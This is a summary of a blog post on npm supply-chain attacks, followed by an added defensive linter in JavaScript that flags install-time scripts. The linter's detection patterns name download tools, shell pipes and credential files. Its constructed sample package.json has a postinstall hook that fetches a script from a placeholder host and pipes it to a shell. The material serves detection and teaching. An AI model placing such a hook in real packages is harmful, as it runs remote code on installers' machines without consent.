# Oh no, not again... a meditation on NPM supply chain attacks

Published: Sep 9, 2025 ~ 1700 words | ~ 8 min read
Tags: NodeJS, JavaScript, Exploits, Security, Enterprise

---

## Overview

The author reflects on enduring security failures in the JavaScript and Node.js ecosystem, focusing on Microsoft's stewardship of NPM (through its subsidiary GitHub) and the continuing risk of supply chain attacks in 2025. Despite technological evolution, the ecosystem remains vulnerable, and Microsoft's ownership has arguably created larger systemic threats.

---

## Key Points

### Microsoft as a "Bad Actor"

- The author bluntly states that Microsoft in 2025 should be viewed as a "bad actor" threatening software companies, because of poor security practices and negligence.
- Historical parallels with Microsoft's mismanagement of Internet Explorer in the early 2000s highlight a pattern of insecurity and abandonment.

### Historical Context: Past and Present Risks

- In the late 1990s and early 2000s, Microsoft's Internet Explorer was deeply embedded in Windows but insecure, exposing users to security breaches.
- Legal action forced Microsoft to allow browser choice, but Microsoft never removed IE, leaving its security risks in place for years.
- Similarly, Microsoft's handling of NPM since GitHub acquired it in 2020 (GitHub itself has been owned by Microsoft since 2018) has not effectively addressed the security weaknesses of the package system.

### The NPM Supply Chain Problem

- NPM has become the largest and easiest channel for distributing malware; payloads have evolved from targeting cryptocurrency wallets to harvesting credentials such as tokens and access keys.
- Past incidents such as the xz-utils backdoor (outside the npm ecosystem, but the same dependency-compromise pattern) and the malicious Nx package releases demonstrate the systemic threat from compromised dependencies.
- The ecosystem's architecture, in particular install-time lifecycle hooks such as postinstall scripts, lets arbitrary and potentially malicious code execute on install without the installing user's consent.

### Personal Experience and Early Warnings

- The author has a long history with Node.js and was already concerned about NPM's security around 2015.
- They created proof-of-concept exploits to highlight the risks, such as executing arbitrary scripts via npx using a package with an embedded postinstall command.
- They developed a package.json linter to warn developers about dangerous scripts, but adoption was limited by trust issues and its opt-in nature.
- These problems predate Microsoft's ownership but, the author argues, have worsened under its management.

### The State of the Ecosystem

- Early NPM solved real package-management problems, enabling a flourishing but wild-west JavaScript ecosystem.
- Fragmentation followed as alternatives like Yarn and PNPM appeared out of dissatisfaction with NPM.
- Microsoft's acquisition injected financial stability but no significant security improvements.
- Tools like GitHub's Dependabot and Software Bill of Materials (SBOM) attestation are positive steps but insufficient.
- In the author's assessment, no strong package signing exists, and nothing prevents repository squatting or AI-generated junk packages.

### Urgent Call for Action

- The current software ecosystem is fragile, insecure by default, and overly dependent on companies like Microsoft that are not adequately accountable.
- Security risks affect not just developers but customers, workers, and corporate profits.
- Advances in AI will enable more sophisticated attacks, including social engineering enhanced by deepfakes.
- Two-factor authentication alone is insufficient to secure the NPM ecosystem.
- Companies must urgently re-evaluate their software tools and supply chain security to mitigate these growing threats.

---

## Conclusion

The situation in 2025 echoes the security failures of the past, but with far greater implications because of modern software complexity and widespread dependency on NPM. Without an industry-wide commitment to built-in supply chain security, the risks will escalate. Microsoft's current handling leaves the community exposed, making it critical for organizations to scrutinize their software infrastructure and demand better protections.
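As an added illustration of two points above, that install-time lifecycle hooks such as postinstall run code without the installer's consent, and that a package.json linter can at least warn about them, here is a small linter written for this summary. It is not the author's linter or proof of concept; the detection patterns are heuristics chosen here, the sample package.json is constructed (the package name and URL are invented), and the only npm facts it relies on are the real lifecycle hook names and the real `ignore-scripts` config option.

```javascript
// Added example for this summary, not the author's linter or proof of concept.
// Flags npm lifecycle scripts that run automatically on install (the postinstall
// problem) and checks whether an .npmrc disables them. Node >= 14, no dependencies,
// runs offline on the constructed sample below.

// Hooks npm runs without prompting during `npm install` / `npx` (real npm behaviour;
// `prepare` also fires when a dependency is installed from git).
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic patterns common in install-time payloads (chosen for this example).
// A hit is a reason to read the script, not proof of malice.
const SUSPICIOUS = [
  { re: /\bcurl\b|\bwget\b/,                       why: "downloads content at install time" },
  { re: /\|\s*(sh|bash)\b/,                        why: "pipes content into a shell" },
  { re: /\bnode\s+-e\b/,                           why: "evaluates inline JavaScript" },
  { re: /\b(eval|Function)\s*\(/,                  why: "dynamic code evaluation" },
  { re: /base64|atob\(/i,                          why: "encoded payload" },
  { re: /\$\{?\w*(TOKEN|KEY|SECRET)/i,             why: "reads a credential-looking variable" },
  { re: /\.npmrc|\.ssh|\.aws|\.git-credentials/,   why: "touches credential files" },
];

// Returns one finding per install hook present in package.json. Every install hook
// is reported (severity "info") because it executes without the installer's consent;
// hooks that match a pattern are raised to "high".
function lintPackageJson(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const reasons = SUSPICIOUS.filter(({ re }) => re.test(cmd)).map(({ why }) => why);
    findings.push({ hook, cmd, severity: reasons.length ? "high" : "info", reasons });
  }
  return findings;
}

// True if the .npmrc text turns on npm's real `ignore-scripts` option, which stops
// all lifecycle scripts (the same effect as `npm ci --ignore-scripts`).
function npmrcDisablesScripts(npmrcText) {
  return npmrcText.split(/\r?\n/).some((line) => {
    const m = line.trim().match(/^ignore-scripts\s*=\s*(\S+)/i);
    return m !== null && m[1].toLowerCase() === "true";
  });
}

// Constructed sample package.json in the shape of an install-time credential stealer.
// The package name and URL are invented; nothing here refers to a real package.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "example-string-utils",
  version: "1.0.3",
  scripts: {
    test: "node test.js",
    postinstall: "node -e \"require('child_process').exec('curl -s https://example.invalid/p | sh')\"",
    prepare: "node build.js",
  },
});

// Stand-alone run: print the report for the sample and the .npmrc check.
for (const f of lintPackageJson(SAMPLE_PACKAGE_JSON)) {
  console.log(`[${f.severity}] ${f.hook}: ${f.cmd}`);
  for (const why of f.reasons) console.log(`    - ${why}`);
}
console.log(
  "ignore-scripts set:",
  npmrcDisablesScripts("registry=https://registry.npmjs.org/\nignore-scripts=true\n")
);
```

On the sample, `postinstall` is reported as high (curl, a pipe into sh, and inline `node -e`) while `prepare` is reported as info only, since an ordinary build step still runs unprompted. The blunt fix is `ignore-scripts=true` in `.npmrc` or `npm ci --ignore-scripts`; the caveat is that it also skips legitimate build steps such as native addon compilation, so teams that adopt it usually run those few packages' scripts explicitly rather than re-enabling hooks for everything.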